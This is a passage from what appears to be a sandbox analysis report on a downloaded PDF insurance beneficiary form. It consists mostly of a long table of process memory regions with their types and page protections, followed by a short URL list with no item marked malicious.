|
stack
|
page read and write
|
||
2645DF60000
|
trusted library allocation
|
page read and write
|
||
21DF6F50000
|
heap
|
page read and write
|
||
274143DE000
|
heap
|
page read and write
|
||
2567B202000
|
heap
|
page read and write
|
||
2567B1FA000
|
heap
|
page read and write
|
||
7D04C7E000
|
stack
|
page read and write
|
||
1C76F42A000
|
heap
|
page read and write
|
||
1EC18A54000
|
heap
|
page read and write
|
||
2CB0000
|
heap
|
page read and write
|
||
2026AE79000
|
heap
|
page read and write
|
||
2EB0000
|
heap
|
page read and write
|
||
27413C00000
|
heap
|
page read and write
|
||
27413ECB000
|
heap
|
page read and write
|
||
1EC18A54000
|
heap
|
page read and write
|
||
27C0000
|
heap
|
page read and write
|
||
2567CB9C000
|
heap
|
page read and write
|
||
57C000
|
heap
|
page read and write
|
||
573000
|
heap
|
page read and write
|
||
57C000
|
heap
|
page read and write
|
||
2645E221000
|
heap
|
page read and write
|
||
27413C1E000
|
heap
|
page read and write
|
||
A330000
|
trusted library allocation
|
page read and write
|
||
2567CD70000
|
heap
|
page read and write
|
||
2567B1AC000
|
heap
|
page read and write
|
||
274143F2000
|
heap
|
page read and write
|
||
42B000
|
unkown
|
page readonly
|
||
1C76F1EB000
|
heap
|
page read and write
|
||
564000
|
heap
|
page read and write
|
||
27413C2B000
|
heap
|
page read and write
|
||
27413DB0000
|
heap
|
page read and write
|
||
27413BF9000
|
heap
|
page read and write
|
||
EDF50FE000
|
stack
|
page read and write
|
||
2645E292000
|
heap
|
page read and write
|
||
567000
|
heap
|
page read and write
|
||
203B0645000
|
heap
|
page read and write
|
||
CBED347000
|
stack
|
page read and write
|
||
A340000
|
trusted library allocation
|
page read and write
|
||
7D043FC000
|
stack
|
page read and write
|
||
21DF53CD000
|
heap
|
page read and write
|
||
2C00000
|
heap
|
page read and write
|
||
E5FDAFE000
|
stack
|
page read and write
|
||
2026AE95000
|
heap
|
page read and write
|
||
27413EC5000
|
heap
|
page read and write
|
||
9D7000
|
heap
|
page read and write
|
||
26458A2B000
|
heap
|
page read and write
|
||
27413C12000
|
heap
|
page read and write
|
||
1EC191CB000
|
heap
|
page read and write
|
||
27413C1A000
|
heap
|
page read and write
|
||
1EF63839000
|
heap
|
page read and write
|
||
27413C12000
|
heap
|
page read and write
|
||
D6687A000
|
stack
|
page read and write
|
||
7D033F9000
|
stack
|
page read and write
|
||
2567B1C9000
|
heap
|
page read and write
|
||
BB9F000
|
heap
|
page read and write
|
||
1F400D7C000
|
heap
|
page read and write
|
||
B076000
|
heap
|
page read and write
|
||
1C76F3B0000
|
heap
|
page read and write
|
||
2567B1F6000
|
heap
|
page read and write
|
||
A1CC59F000
|
stack
|
page read and write
|
||
2026ADB0000
|
trusted library allocation
|
page read and write
|
||
23AD000
|
stack
|
page read and write
|
||
1F4006F2000
|
heap
|
page read and write
|
||
4344CB7000
|
stack
|
page read and write
|
||
2645E100000
|
remote allocation
|
page read and write
|
||
2026AE85000
|
heap
|
page read and write
|
||
2026ADFB000
|
heap
|
page read and write
|
||
21DF5360000
|
heap
|
page read and write
|
||
D66A7F000
|
stack
|
page read and write
|
||
B077000
|
heap
|
page read and write
|
||
26459B90000
|
trusted library section
|
page readonly
|
||
1C76F1B0000
|
heap
|
page read and write
|
||
B18D000
|
heap
|
page read and write
|
||
2026B3C8000
|
heap
|
page read and write
|
||
264589B0000
|
heap
|
page read and write
|
||
1C76F920000
|
heap
|
page read and write
|
||
27C7000
|
heap
|
page read and write
|
||
1EC18A13000
|
heap
|
page read and write
|
||
A8B2000
|
heap
|
page read and write
|
||
26459970000
|
trusted library allocation
|
page read and write
|
||
132C79B000
|
stack
|
page read and write
|
||
1F4006F7000
|
heap
|
page read and write
|
||
A570000
|
trusted library allocation
|
page read and write
|
||
B2B2000
|
heap
|
page read and write
|
||
1C76F42A000
|
heap
|
page read and write
|
||
1F400740000
|
heap
|
page read and write
|
||
CE90000
|
trusted library allocation
|
page read and write
|
||
203B0528000
|
heap
|
page read and write
|
||
1EF63A95000
|
heap
|
page read and write
|
||
28EF000
|
unkown
|
page read and write
|
||
2567CAD0000
|
heap
|
page read and write
|
||
26458ABD000
|
heap
|
page read and write
|
||
BCC0000
|
trusted library allocation
|
page read and write
|
||
2567B130000
|
heap
|
page read and write
|
||
2567CD73000
|
heap
|
page read and write
|
||
264589A0000
|
heap
|
page read and write
|
||
27413C12000
|
heap
|
page read and write
|
||
1EC18A54000
|
heap
|
page read and write
|
||
1F400C25000
|
heap
|
page read and write
|
||
2026ADF5000
|
heap
|
page read and write
|
||
2645E100000
|
remote allocation
|
page read and write
|
||
1EF63F94000
|
heap
|
page read and write
|
||
2026AE24000
|
heap
|
page read and write
|
||
1F400719000
|
heap
|
page read and write
|
||
B2B2000
|
heap
|
page read and write
|
||
203B0520000
|
heap
|
page read and write
|
||
26458A13000
|
heap
|
page read and write
|
||
1C76F2B0000
|
heap
|
page read and write
|
||
D669FE000
|
stack
|
page read and write
|
||
2810000
|
heap
|
page read and write
|
||
1EF63854000
|
heap
|
page read and write
|
||
1F40071A000
|
heap
|
page read and write
|
||
2567B1C4000
|
heap
|
page read and write
|
||
1C76F928000
|
heap
|
page read and write
|
||
1F400715000
|
heap
|
page read and write
|
||
1C76F423000
|
heap
|
page read and write
|
||
1EC18970000
|
trusted library allocation
|
page read and write
|
||
2567B201000
|
heap
|
page read and write
|
||
A677000
|
heap
|
page read and write
|
||
2645DF80000
|
trusted library allocation
|
page read and write
|
||
1EF63846000
|
heap
|
page read and write
|
||
1EF63817000
|
heap
|
page read and write
|
||
55E000
|
heap
|
page read and write
|
||
1EF63812000
|
heap
|
page read and write
|
||
2567B209000
|
heap
|
page read and write
|
||
2645F000000
|
heap
|
page read and write
|
||
2567B1F6000
|
heap
|
page read and write
|
||
2026B3CC000
|
heap
|
page read and write
|
||
1F400C24000
|
heap
|
page read and write
|
||
1EF63E30000
|
heap
|
page read and write
|
||
1EF63E35000
|
heap
|
page read and write
|
||
1C76F1E9000
|
heap
|
page read and write
|
||
3A1000
|
unkown
|
page execute read
|
||
2026AE52000
|
heap
|
page read and write
|
||
456000
|
unkown
|
page write copy
|
||
B186000
|
heap
|
page read and write
|
||
2026AE7B000
|
heap
|
page read and write
|
||
1F4006A0000
|
heap
|
page read and write
|
||
2645DF64000
|
trusted library allocation
|
page read and write
|
||
D260AFE000
|
stack
|
page read and write
|
||
55A000
|
heap
|
page read and write
|
||
5A3000
|
heap
|
page read and write
|
||
1EC191CE000
|
heap
|
page read and write
|
||
2567B1F6000
|
heap
|
page read and write
|
||
7D02C7B000
|
stack
|
page read and write
|
||
E5FDB7E000
|
stack
|
page read and write
|
||
2645931A000
|
heap
|
page read and write
|
||
532767E000
|
stack
|
page read and write
|
||
1EF63A30000
|
trusted library allocation
|
page read and write
|
||
2645E244000
|
heap
|
page read and write
|
||
1EC18850000
|
heap
|
page read and write
|
||
2567B1F6000
|
heap
|
page read and write
|
||
7D03C7E000
|
stack
|
page read and write
|
||
2567B203000
|
heap
|
page read and write
|
||
1F400733000
|
heap
|
page read and write
|
||
7D039FB000
|
stack
|
page read and write
|
||
1EC18CB0000
|
heap
|
page read and write
|
||
2645E0C0000
|
trusted library allocation
|
page read and write
|
||
2026AF40000
|
trusted library allocation
|
page read and write
|
||
26459300000
|
heap
|
page read and write
|
||
2567CAB0000
|
trusted library allocation
|
page read and write
|
||
1EC19007000
|
heap
|
page read and write
|
||
1EC191CA000
|
heap
|
page read and write
|
||
A6CD000
|
heap
|
page read and write
|
||
2026AE27000
|
heap
|
page read and write
|
||
9D7000
|
heap
|
page read and write
|
||
2645E25A000
|
heap
|
page read and write
|
||
A8BB000
|
heap
|
page read and write
|
||
2645E211000
|
heap
|
page read and write
|
||
1EC18A69000
|
heap
|
page read and write
|
||
203B0599000
|
heap
|
page read and write
|
||
1EF63A30000
|
trusted library allocation
|
page read and write
|
||
27413C1F000
|
heap
|
page read and write
|
||
2026AE94000
|
heap
|
page read and write
|
||
1C76F1EB000
|
heap
|
page read and write
|
||
7D041FE000
|
unkown
|
page readonly
|
||
2645E2ED000
|
heap
|
page read and write
|
||
7D045FB000
|
stack
|
page read and write
|
||
2645DF62000
|
trusted library allocation
|
page read and write
|
||
1EF63852000
|
heap
|
page read and write
|
||
1F400C22000
|
heap
|
page read and write
|
||
274143F4000
|
heap
|
page read and write
|
||
26459215000
|
heap
|
page read and write
|
||
7D04CFE000
|
unkown
|
page readonly
|
||
26459B60000
|
trusted library section
|
page readonly
|
||
1EC19014000
|
heap
|
page read and write
|
||
2567B1FA000
|
heap
|
page read and write
|
||
203B0552000
|
heap
|
page read and write
|
||
1EF659E0000
|
heap
|
page read and write
|
||
2567B1D0000
|
heap
|
page read and write
|
||
27413C1F000
|
heap
|
page read and write
|
||
2026CE00000
|
heap
|
page read and write
|
||
7D02FF7000
|
stack
|
page read and write
|
||
D66AFE000
|
stack
|
page read and write
|
||
2567B201000
|
heap
|
page read and write
|
||
2567B206000
|
heap
|
page read and write
|
||
1F4007E0000
|
trusted library allocation
|
page read and write
|
||
2645935A000
|
heap
|
page read and write
|
||
21DF5330000
|
heap
|
page read and write
|
||
579000
|
heap
|
page read and write
|
||
BCCF000
|
heap
|
page read and write
|
||
1EC189A0000
|
heap
|
page read and write
|
||
19C4DA60000
|
heap
|
page read and write
|
||
2026AE2B000
|
heap
|
page read and write
|
||
2567B1FA000
|
heap
|
page read and write
|
||
1C76F425000
|
heap
|
page read and write
|
||
1EC18A48000
|
heap
|
page read and write
|
||
27413B70000
|
heap
|
page read and write
|
||
1F400BC0000
|
heap
|
page read and write
|
||
2645E030000
|
trusted library allocation
|
page read and write
|
||
43451FB000
|
stack
|
page read and write
|
||
BA80000
|
trusted library allocation
|
page read and write
|
||
325F000
|
stack
|
page read and write
|
||
3A1000
|
unkown
|
page execute read
|
||
2645E200000
|
heap
|
page read and write
|
||
2645DF61000
|
trusted library allocation
|
page read and write
|
||
1EF63E32000
|
heap
|
page read and write
|
||
1F400C27000
|
heap
|
page read and write
|
||
2567EBD0000
|
trusted library allocation
|
page read and write
|
||
26458980000
|
heap
|
page read and write
|
||
C6CF000
|
heap
|
page read and write
|
||
45E000
|
unkown
|
page readonly
|
||
1EC18A3A000
|
heap
|
page read and write
|
||
7D042FE000
|
unkown
|
page readonly
|
||
2567B0F0000
|
heap
|
page read and write
|
||
A673000
|
heap
|
page read and write
|
||
2645E0B0000
|
trusted library allocation
|
page read and write
|
||
A6EB000
|
heap
|
page read and write
|
||
43450FE000
|
stack
|
page read and write
|
||
2026AE92000
|
heap
|
page read and write
|
||
55D000
|
heap
|
page read and write
|
||
1EF63A10000
|
heap
|
page read and write
|
||
2D3D000
|
stack
|
page read and write
|
||
B2BB000
|
heap
|
page read and write
|
||
1EF63A90000
|
heap
|
page read and write
|
||
1C76F427000
|
heap
|
page read and write
|
||
296E000
|
stack
|
page read and write
|
||
272E000
|
unkown
|
page read and write
|
||
2645E090000
|
trusted library allocation
|
page read and write
|
||
1F4006EE000
|
heap
|
page read and write
|
||
1C76F932000
|
heap
|
page read and write
|
||
2DCE000
|
unkown
|
page read and write
|
||
1C76F1EA000
|
heap
|
page read and write
|
||
27C3000
|
heap
|
page read and write
|
||
2645DF40000
|
trusted library allocation
|
page read and write
|
||
21DF5391000
|
heap
|
page read and write
|
||
1EC191C7000
|
heap
|
page read and write
|
||
E5FDA7F000
|
stack
|
page read and write
|
||
D6697F000
|
stack
|
page read and write
|
||
2567B1FA000
|
heap
|
page read and write
|
||
2567B201000
|
heap
|
page read and write
|
||
B07A000
|
heap
|
page read and write
|
||
2026AE2A000
|
heap
|
page read and write
|
||
2026AC90000
|
heap
|
page read and write
|
||
A8B7000
|
heap
|
page read and write
|
||
2610000
|
heap
|
page read and write
|
||
19C4DC00000
|
heap
|
page read and write
|
||
53274FF000
|
stack
|
page read and write
|
||
1C76F205000
|
heap
|
page read and write
|
||
577000
|
heap
|
page read and write
|
||
1F4006E0000
|
heap
|
page read and write
|
||
2770000
|
heap
|
page read and write
|
||
3A0000
|
unkown
|
page readonly
|
||
27413C00000
|
heap
|
page read and write
|
||
2645E22E000
|
heap
|
page read and write
|
||
1C76F42E000
|
heap
|
page read and write
|
||
53276FE000
|
stack
|
page read and write
|
||
CBED3CE000
|
stack
|
page read and write
|
||
1F400715000
|
heap
|
page read and write
|
||
44F0000
|
heap
|
page read and write
|
||
2026AE27000
|
heap
|
page read and write
|
||
1F40071E000
|
heap
|
page read and write
|
||
B2BA000
|
heap
|
page read and write
|
||
A78D000
|
heap
|
page read and write
|
||
26458A7A000
|
heap
|
page read and write
|
||
B189000
|
heap
|
page read and write
|
||
203B0650000
|
heap
|
page read and write
|
||
3A0000
|
unkown
|
page readonly
|
||
27413BF6000
|
heap
|
page read and write
|
||
26458A5C000
|
heap
|
page read and write
|
||
274143D5000
|
heap
|
page read and write
|
||
2C3D000
|
stack
|
page read and write
|
||
4344D3E000
|
stack
|
page read and write
|
||
274143E7000
|
heap
|
page read and write
|
||
2567B1EE000
|
heap
|
page read and write
|
||
2645DF10000
|
trusted library allocation
|
page read and write
|
||
203B05C0000
|
heap
|
page read and write
|
||
1F400810000
|
heap
|
page read and write
|
||
E5FD7EE000
|
stack
|
page read and write
|
||
1C76F400000
|
heap
|
page read and write
|
||
C483000
|
heap
|
page read and write
|
||
1C76F1C7000
|
heap
|
page read and write
|
||
1EF6383D000
|
heap
|
page read and write
|
||
2D80000
|
heap
|
page read and write
|
||
1EF63838000
|
heap
|
page read and write
|
||
1EC191C7000
|
heap
|
page read and write
|
||
2645DFA4000
|
trusted library allocation
|
page read and write
|
||
456000
|
unkown
|
page write copy
|
||
1EF6385E000
|
heap
|
page read and write
|
||
A241000
|
heap
|
page read and write
|
||
2026AE40000
|
heap
|
page read and write
|
||
CBED7FF000
|
stack
|
page read and write
|
||
2567B206000
|
heap
|
page read and write
|
||
1C76F1E5000
|
heap
|
page read and write
|
||
EDF52FF000
|
stack
|
page read and write
|
||
26458A41000
|
heap
|
page read and write
|
||
7D03DFE000
|
unkown
|
page readonly
|
||
1C76F42B000
|
heap
|
page read and write
|
||
A78C000
|
heap
|
page read and write
|
||
EDF4EFA000
|
stack
|
page read and write
|
||
2026AE92000
|
heap
|
page read and write
|
||
1F400D82000
|
heap
|
page read and write
|
||
EDF53FE000
|
stack
|
page read and write
|
||
532747A000
|
stack
|
page read and write
|
||
1EF63F88000
|
heap
|
page read and write
|
||
264589F0000
|
trusted library section
|
page read and write
|
||
2567B1F6000
|
heap
|
page read and write
|
||
E5FD76D000
|
stack
|
page read and write
|
||
1EC18A37000
|
heap
|
page read and write
|
||
1EF63A60000
|
heap
|
page read and write
|
||
2567B201000
|
heap
|
page read and write
|
||
3A0000
|
unkown
|
page readonly
|
||
27413EC0000
|
heap
|
page read and write
|
||
2567D0C0000
|
heap
|
page read and write
|
||
1C76F427000
|
heap
|
page read and write
|
||
A1CC97F000
|
stack
|
page read and write
|
||
21DF5530000
|
heap
|
page read and write
|
||
7D0427E000
|
stack
|
page read and write
|
||
21DF55E5000
|
heap
|
page read and write
|
||
26458A7C000
|
heap
|
page read and write
|
||
1EF63E3A000
|
heap
|
page read and write
|
||
1F40084B000
|
heap
|
page read and write
|
||
2567B1F6000
|
heap
|
page read and write
|
||
7D046FE000
|
unkown
|
page readonly
|
||
579000
|
heap
|
page read and write
|
||
4344DBE000
|
stack
|
page read and write
|
There are 776 hidden memdumps, click here to show them.
DOM / HTML
URL
|
Malicious
|
|
---|---|---|
https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdf
|
||
file:///C:/Users/user/Downloads/downloaded.pdf
|
||
file:///C:/Users/user/Downloads/downloaded.pdf
|